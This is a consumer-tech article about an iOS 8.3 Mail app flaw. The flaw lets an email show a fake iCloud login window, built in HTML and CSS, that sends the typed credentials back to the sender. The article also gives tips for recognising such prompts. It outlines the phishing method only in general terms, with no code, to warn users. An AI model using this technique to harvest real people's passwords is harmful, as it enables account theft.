Apple’s iCloud platform is a very popular feature for users, allowing you to share photos, music, data, as well as your location between all of your devices. This bug in the iOS mail app could also provide access to all of this personal information to strangers who could use that information for their own purposes. All that is required is your user email and password to gain access.
It’s not uncommon for your iPhone to display a prompt asking users for these credentials occasionally. Unfortunately, someone has found a way to exploit this through your built in mail app. The would-be phishing scam can take advantage of the mail apps inability to properly remove harmful HTML code from your email. Someone could create an authentication window using HTML and CSS (two of the most common web languages) to display a form that looks identical to the one used by your iPhone. The form then sends that information back to the person that sent the email to you. Jan Soucek, a security researcher based in Prague, discovered the bug in Apple’s mail app and alerted them of the susceptibility for abuse in January. Apple has since issued an update to their iPhone operating system, however this vulnerability remains. When Soucek realized there was no fix for the vulnerability he discovered, he published the code. His code will only display the authentication window once, reducing suspicion. Apple has always taken steps to improve security, and will no doubt make the necessary improvements to insure that this doesn’t effect anyone, especially after the media attention this issue is receiving.
Here is the video: Proof-of-concept: iOS 8.3 Mail.app attack
As bad as it may seem, this bug in iOS mail app, is not the worst thing that can happen to you, there are steps you can take to protect yourself. If you experience this, press cancel then the home button. The authentication window will not reappear if it is not legitimate. If you see an authentication window and it has predictive text on top of the keyboard, then it’s not a real one. Predictive text is disabled for secure windows in iOS. Another thing to look for is the “GO” button. This is indicative of a form being sent.
Like all things, you must be aware of your environment. Whether you’re walking down the street or using your email, being aware of your surroundings will help you stay safe.